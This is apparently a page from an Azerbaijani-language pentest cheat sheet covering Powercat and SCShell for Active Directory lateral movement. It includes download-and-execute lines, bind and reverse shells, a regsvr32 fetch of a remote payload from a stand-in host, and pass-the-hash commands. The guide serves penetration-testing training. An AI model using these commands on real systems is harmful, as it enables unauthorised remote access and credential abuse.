Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Powercat
  • Əlaqənin qurulması
  • Shells
  • Fayl Transferi
  • Misc İstifadəsi
  • SCShell

Was this helpful?

  1. AD Pentesting
  2. Lateral Movement

Useful Tools

PreviousURL File AttacksNextDomain Privilege Escalation

Last updated 1 year ago

Was this helpful?

Powercat

"PowerCat" PowerShell əsaslı şəbəkə alətidir. Bu alət TCP və UDP əlaqələrini yaratmaq, dinləmək və idarə etmək üçün PowerShell skriptlərindən istifadə edir.

Yükləmək üçün istifadə edin.

Powercat powershell funksiyasıdır. Bu aləti istifadə etmək üçün əvvəlcə onu cari sessiyaya yükləməliyik. Aşağıdakı əmrlərdən istifadə edərək powercat'i cari sessiyaya yükləmək mümkündür:

# Funksiyanı endirilmiş .ps1 faylından yükləyir:
    . .\powercat.ps1
# Funksiyanı verilmiş URL'dən yükləyir:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parametrlər:

-l      Əlaqə üçün dinləyir.                                  [Switch]
-c      Dinləyiciyə qoşulur.                                  [String]
-p      Dinlənilən və ya əlaqə qurulacaq port.                [String]
-e      Execute.                                              [String]
-ep     Execute Powershell.                                   [Switch]
-r      Relay. Format: "-r tcp:10.1.1.1:443"                  [String]
-u      Məlumatı UDP üzərindən transfer edir.                 [Switch]
-dns    Məlumatı dns (dnscat2) üzərindən transfer edir.       [String]
-dnsft  DNS Failure Threshold.                                [int32]
-t      Timeout parametri. Default: 60                        [int32]
-i      Input: Filepath (string), byte array, or string.      [object]
-o      Console Output Type: "Host", "Bytes", or "String"     [String]
-of     Output fayl yolu(path).                               [String]
-d      Qoşulduqdan sonra əlaqəni kəsir.                      [Switch]
-rep    Repeater. Əlaqə kəsildikdən sonra yeniləyə bilir.     [Switch]
-g      Payload yaradır.                                      [Switch]
-ge     Encode olunmuş payload yaradır.                       [Switch]
-h      Kömək mesajını çap edir.                              [Switch]

Əlaqənin qurulması

# Verilmiş İP ünvanına və porta qoşulmaq üçün
    powercat -c <ip> -p <port-nömrəsi>
# 8000 portunda əlaqə üçün dinləyir:
    powercat -l -p 8000
# Birinci əmrin eynisidir,sadəcə binary formatında output faylı verir:
    powercat -c <ip> -p <port-nömrəsi> -o Bytes

Shells

Powercat shell göndərmək və shell kimi xidmət etmək üçün istifadə edilə bilər.

# Bu əmr göstərilən port nömrəsndə dinləyir və daxil olan əlaqələri cmd'ə (cmd.exe) yönləndirir.
    powercat -l -p <port-nömrəsi> -e cmd
# Bu əmr göstərilən ip ünvanı ilə verilən port ilə əlaqə qurur və daxil olan əlaqələri cmd'ə (cmd.exe) yönləndirir.
    powercat -c <ip> -p <port-nömrəsi> -e cmd
# Bu əmr göstərilən port nömrəsndə dinləyir və daxil olan əlaqələri PowerShell'ə (-ep) yönləndirir.
    powercat -l -p <port-nömrəsi> -ep

Fayl Transferi

Powercat faylları -i (Input) və -of (Output fayl) parametrlərindən istifadə edərək faylları göndərir və qəbul edir.

# Fayl göndərmək üçün:
    powercat -c <ip> -p <port-nömrəsi> -i C:\inputfile
# Faylı qəbul etmək üçün:
    powercat -l -p 8000 -of C:\inputfile

Misc İstifadəsi

Powercat, port skanları həyata keçirmək,davamlı (persistent) serverlər başlatmaq üçün istifadə edilə bilər.

# TCP port skanı:
    (21,22,80,443) | % {powercat -c <port-nömrəsi> -p $_ -t 1 -Verbose -d}
# Fayllar üçün persistent server başladır:
    powercat -l -p <port-nömrəsi> -i C:\inputfile -rep
# Bu PowerShell əmri input fayllarının məzmununu oxuyur (C:\inputfile), ForEach-Object-dən istifadə edərək hər sətri 2-yə vurur və nəticəni çıxış faylına (C:\outputfile) əlavə edir.

SCShell

SCShell, əmrləri yerinə yetirmək üçün ChangeServiceConfigA 'dan istifadə edən faylsız yanal hərəkət alətidir. Bu alətin gözəlliyi ondadır ki, o, SMB'ə qarşı autentifikasiya həyata keçirmir, hər şey DCERPC üzərindən həyata keçirilir. SCShell hər hansı bir xidmətdən qeydiyyatdan keçmədən, uzaqdan istifadə edilə bilər.

İstifadəsi:

# Rmote execution
SCShell.exe <ip> XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password

və ya msbuild payloadından istifadə edə bilərsiniz:

SCShell.exe <ip> XblAuthManager "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator Password

# Verilmiş ip ünvanına qoşulmağa çalışır
# İstifadəçi adı LogonUserA'ı çağırmaq üçün istifadə olunur
# SC_HANDLE Manager 0x009ED250
# XblAuthManager'i açır (Xbox Accessory Management Service)
# SC_HANDLE Service 0x009ED1B0
# Servisin yolu (path) bu dəyərə dəyişdirilir  C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj
# Servis başladılır

Passing the Hash

scshell.py SCShell'in python2 və 3 tətbiqidir. İmpacket layihəsindən istifadə edərək, hash ilə yanal hərəkət yerinə yetirilə bilər.

Impacket Yüklənməsi:

pip install impacket

İmpacket kitabxanası şəbəkə protokolları ilə işləmək üçün Pythonda olan siniflər toplusudur.

İstifadəsi:

python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Command need to use FULL path. No command output.
SCShell>

Bu əmr, istifadəçi etimadnaməsi və NTLM hash ilə autentifikasiya edərək, xidmətlə əlaqəli əmrlər icra etmək üçün interaktiv "SCShell>" əldə edir.

Yükləmək üçün istifadə edin.

SCShell haqqında daha çox məlumat toplamaq üçün istifadə edin.

bu keçiddən
bu keçiddən
bu keçiddən